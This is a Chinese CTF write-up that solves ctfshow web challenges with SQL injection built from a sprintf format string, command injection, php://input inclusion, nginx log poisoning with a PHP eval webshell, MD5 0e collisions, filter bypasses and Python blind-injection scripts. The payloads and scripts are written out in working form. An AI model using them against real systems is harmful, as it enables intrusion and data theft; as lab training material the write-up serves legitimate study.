【日志注入&文件包含&SQL盲注】2021.7.20 CTFshow刷题

CTF show 萌新赛

web1 【给她】

拿到题目,界面如下:

image-20210720140432960

可以看到我们需要传参数,猜测是传namepass参数

1
http://f6f64ebd-116f-4e11-974c-6674ecc4b2c1.challenge.ctf.show:8080/?name=admin&pass=admin

image-20210720140536814

尝试使用万能密码

1
http://f6f64ebd-116f-4e11-974c-6674ecc4b2c1.challenge.ctf.show:8080/?name=admin' or 1=1--+&pass=admin

image-20210720140656805

可以看到,单引号被过滤了。

暂时还没什么思路,就先扫一下目录

1
python3 dirsearch.py -u http://f6f64ebd-116f-4e11-974c-6674ecc4b2c1.challenge.ctf.show:8080/

image-20210720140833673

可以看到,很明显存在git泄露。(题目名称的谐音是git……

使用Githack抓下来

1
python Githacker.py https://92e3e5e8-89bd-4ac5-b4d1-c46cee76eb46.challenge.ctf.show_8080/.git

image-20210720141040050

得到一个hint.php文件

  • addslashes函数:在单引号、双引号、反斜杠、NULL前加反斜杠转义
  • sprintf函数:sprintf() 函数把格式化的字符串写入变量中。arg1arg2、*++* 参数将被插入到主字符串中的百分号(%)符号处。该函数是逐步执行的。在第一个 % 符号处,插入 arg1,在第二个 % 符号处,插入 arg2,依此类推。
1
2
3
4
<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>

既然单引号被过滤,那么就想办法构造一个单引号

对于sprintf函数,因为有其中的format位置是可控的,所以对format位置传入%1$c,代表第一个参数位置的类型为%c

然后我们再对name传单引号的ascii码(39),最终payload如下:

1
http://f6f64ebd-116f-4e11-974c-6674ecc4b2c1.challenge.ctf.show:8080/?name=39&pass=1%1$c or 1=1%23

image-20210720143206302

虽然显示着NotFound,但其实还是一个200页面。我们对它进行抓包。

image-20210720143508104

响应头这里显示flag存放的位置

再看请求头

image-20210720143359259

可以看到,Cookie里有file参数,把这一串进行十六进制转字符解码

1
2
666c61672e747874
flag.txt

然后把/flag十六进制编码

1
2
/flag
2f666c6167

得到flag:ctfshow{d4ede337-93c3-4066-8068-6bb8a0f92252}

image-20210720143735278

web2【签到题】

是一道代码审计的题目:

image-20210720144016964

1
2
3
4
5
6
7
<?php 
if(isset($_GET['url'])){
system("curl https://".$_GET['url'].".ctf.show");
}else{
show_source(__FILE__);
}
?>

命令执行,传payload

1
http://295f0bb0-e2ff-4d05-a552-73fb6e4d7fa3.challenge.ctf.show:8080/?url=a;ls;a

image-20210720144626124

然后直接cat flag

1
http://295f0bb0-e2ff-4d05-a552-73fb6e4d7fa3.challenge.ctf.show:8080/?url=a;cat%20flag;a

ctfshow{d64999a5-be93-4709-909b-bc82aac7670b}

CTF show刷题

web1

base64解密

打开题目,检查源码

image-20210720160724491

base解密:ctfshow{0bedf99f-3c35-4c9f-be79-fb2cc2f41190}

image-20210720160759435

web2

sql注入

打开题目,是一个登录框

image-20210720160334775

尝试万能密码无果。

试试用sqlmap

1
sqlmap -r 6.txt -D web2 -T flag --dump

image-20210720160502165

sqlmap一把梭:ctfshow{4bab6bc1-a628-4ce3-b294-28870187c44b}

Payload如下:

1
2
3
4
5
6
7
8
9
10
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 6612 FROM (SELECT(SLEEP(5)))EowR) AND 'XSuz'='XSuz&password=admin

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x717a626a71,0x4d597454664b6e5853445a42416e625a685a734d72676f6f58435654776e6c626963646e72775251,0x716b767171),NULL-- -&password=admin
---

web3

文件包含

题目页面如下:

image-20210720155745913

直接使用PHP伪协议(php://input

1
2
3
http://681fe828-e32b-4aa4-87bb-96d91d62f960.challenge.ctf.show:8080/?url=php://input
PostData:
<?php system(ls); ?>

得到两个文件:

image-20210720160143152

1
2
3
http://681fe828-e32b-4aa4-87bb-96d91d62f960.challenge.ctf.show:8080/?url=php://input
PostData:
<?php system("cat ctf_go_go_go"); ?>

得到flag:ctfshow{64737d2f-350d-4f5a-8934-c3c9c88f5e7e}

web4

日志注入,文件包含

打开题目,页面和web3一样

image-20210720155053363

尝试使用web3的伪协议读取的方法,发现返回error

image-20210720155159678

尝试使用日志注入

抓包发现,服务器是Ubuntu,并且是由nginx搭建的网站,其中nginx日志文件默认地址为/var/log/nginx/access.log以及/var/log/nginx/error.log。

本题access.log文件可打开

1
http://a6343941-fb4f-44a8-b6ad-3a1717ecb735.challenge.ctf.show:8080/?url=/var/log/nginx/access.log

image-20210720155402655

为了防止url编码导致小马上传失败,这里我们先抓包,然后往User-Agent参数里注入一句话木马。

POC如下:

1
2
3
4
5
6
7
8
9
10
GET / HTTP/1.1
Host: a6343941-fb4f-44a8-b6ad-3a1717ecb735.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) <?php @eval($_POST['a']);?>Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 53
Upgrade-Insecure-Requests: 1
Content-Length: 2

然后蚁剑连接一句话木马

image-20210720155626017

得到flag:ctfshow{9a2fb16f-ab30-4c45-b392-99c76d89a140}

web5

打开题目,源码审计

image-20210720161153078

可以看到是md5比较

  • ctype_alpha($string) 函数:检验$string是否为纯字母
  • is_numeric($string)函数:检验$string是否为纯数字

并且v1参数要求是纯字母,v2参数要求是纯数字

传payload:

1
http://3eb255ae-5cf9-45eb-b869-a7229d302ba9.challenge.ctf.show:8080/?v1=DQWRASX&v2=1320830526

得到flag:ctfshow{4ef114d4-462d-44fb-b71d-62ab0ef2d7d2}

附上md5的0e碰撞字典:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708
0e462097431906509019562988736854
314282422
0e990995504821699494520356953734
571579406
0e972379832854295224118025748221
903251147
0e174510503823932942361353209384
1110242161
0e435874558488625891324861198103
1320830526
0e912095958985483346995414060832
1586264293
0e622743671155995737639662718498
2302756269
0e250566888497473798724426794462
2427435592
0e067696952328669732475498472343
2653531602
0e877487522341544758028810610885
3293867441
0e471001201303602543921144570260
3295421201
0e703870333002232681239618856220
3465814713
0e258631645650999664521705537122
3524854780
0e507419062489887827087815735195
3908336290
0e807624498959190415881248245271
4011627063
0e485805687034439905938362701775
4775635065
0e998212089946640967599450361168
4790555361
0e643442214660994430134492464512
5432453531
0e512318699085881630861890526097
5579679820
0e877622011730221803461740184915
5585393579
0e664357355382305805992765337023
6376552501
0e165886706997482187870215578015
7124129977
0e500007361044747804682122060876
7197546197
0e915188576072469101457315675502
7656486157
0e451569119711843337267091732412
QLTHNDT
0e405967825401955372549139051580
QNKCDZO
0e830400451993494058024219903391
EEIZDOI
0e782601363539291779881938479162
TUFEPMC
0e839407194569345277863905212547
UTIPEZQ
0e382098788231234954670291303879
UYXFLOI
0e552539585246568817348686838809
IHKFRNS
0e256160682445802696926137988570
PJNPDWY
0e291529052894702774557631701704
ABJIHVY
0e755264355178451322893275696586
DQWRASX
0e742373665639232907775599582643
DYAXWCA
0e424759758842488633464374063001
GEGHBXL
0e248776895502908863709684713578
GGHMVOE
0e362766013028313274586933780773
GZECLQZ
0e537612333747236407713628225676
NWWKITQ
0e763082070976038347657360817689
NOOPCJF
0e818888003657176127862245791911
MAUXXQC
0e478478466848439040434801845361
MMHUWUV
0e701732711630150438129209816536

web6

sql注入,空格绕过

打开题目,页面和web2一样

image-20210720162747229

尝试使用万能密码登录

1
2
admin' or 1=1#
amdin

image-20210720162829212

显示注入错误

排除各字符后,最终确定是拦截了空格

绕过空格可以使用/**/来绕过

修改payload如下:

1
password=admin&username=admin'/**/or/**/1=1#

image-20210720163037228

可以看到登录成功。

这个使用再使用联合注入:

1
password=admin&username=admin'/**/union/**/select/**/1,2,3#

image-20210720163156395

可以看到回显2,我们在回显2的地方进行注入

1
password=admin&username=admin'/**/union/**/select/**/1,database(),3#

image-20210720163323284

当前数据库为web2

然后再爆表

1
password=admin&username=admin'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web2'),3#

image-20210720163544023

再爆flag表下的字段,

1
password=admin&username=admin'/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),3#

image-20210720163728700

再爆flag字段中的值

1
password=admin&username=admin'/**/union/**/select/**/1,(select/**/group_concat(flag)/**/from/**/web2.flag),3#

image-20210720163849457

得到flag:ctfshow{ac2d7bfa-19dc-492c-ae69-1321c905bdba}

web7

布尔盲注

打开题目,是一道sql注入的题

image-20210720170459873

经过测试后发现,空格被过滤,无法使用联合注入。

因此采用布尔注入

先爆破数据库名称长度

1
http://405238d3-0856-4a35-a434-dc2aaedba9e3.challenge.ctf.show:8080/index.php?id=1'/**/and/**/if(length(database())=4,1,0)#

image-20210720170610777

所以数据库名称长度为4

接下来爆破数据库名称

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php?1'/**/and/**/if((ascii(substr(database(),1,1))=104),1,0)#

import requests

dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_']

url = "http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php"
ans = ""
for i in range( 1 , 5):
for j in dic:
payload = {
'id': "1'/**/and/**/if((ascii(substr(database()," + str(i) + ",1))=" + str(ord(j)) + "),1,0)#"
}
res = requests.get(url , params=payload)
if "If" in res.text:
ans += j
print(ans)

image-20210720201805545

得到数据库名称为web7

接下来爆破数据表名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#1'/**/and/**/if((ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),1,1))=48),1,0)#

import requests

dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',']

url = "http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php"
ans = ""
for i in range( 1 , 15):
for j in dic:
payload = {
'id': "1'/**/and/**/if((ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),"+ str(i) + ",1))=" + str(ord(j)) + "),1,0)#"
}
res = requests.get(url , params=payload)
if "If" in res.text:
ans += j
print(ans)

image-20210720203220804

可以看到一共有三个表,分别是flagpageuser

接下来爆破flag表中的字段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#"1'/**/and/**/if((ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167),1,1))=102),1,0)#"

import requests

dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',']

url = "http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php"
ans = ""
for i in range( 1 , 15):
for j in dic:
payload = {
'id': "1'/**/and/**/if((ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)," + str(i)+ ",1))=" + str(ord(j))+ "),1,0)#"
}
res = requests.get(url , params=payload)
if "If" in res.text:
ans += j
print(ans)

image-20210720204248608

可以看到字段名为flag

接下去跑flag字段下的值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#1'/**/and/**/if((ascii(substr((select/**/group_concat(flag)/**/from/**/web7.flag),1,1))=102),1,0)#

import requests

dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',','{','}','-']

url = "http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php"
ans = ""
for i in range( 1 , 50):
for j in dic:
payload = {
'id': "1'/**/and/**/if((ascii(substr((select/**/group_concat(flag)/**/from/**/web7.flag)," + str(i) +",1))=" + str(ord(j)) + "),1,0)#"
}
res = requests.get(url , params=payload)
if "If" in res.text:
ans += j
print(ans)

image-20210720205102297

得到flag:ctfshow{5a6aab4f-e80f-4c83-af69-4a15a9b30ac4}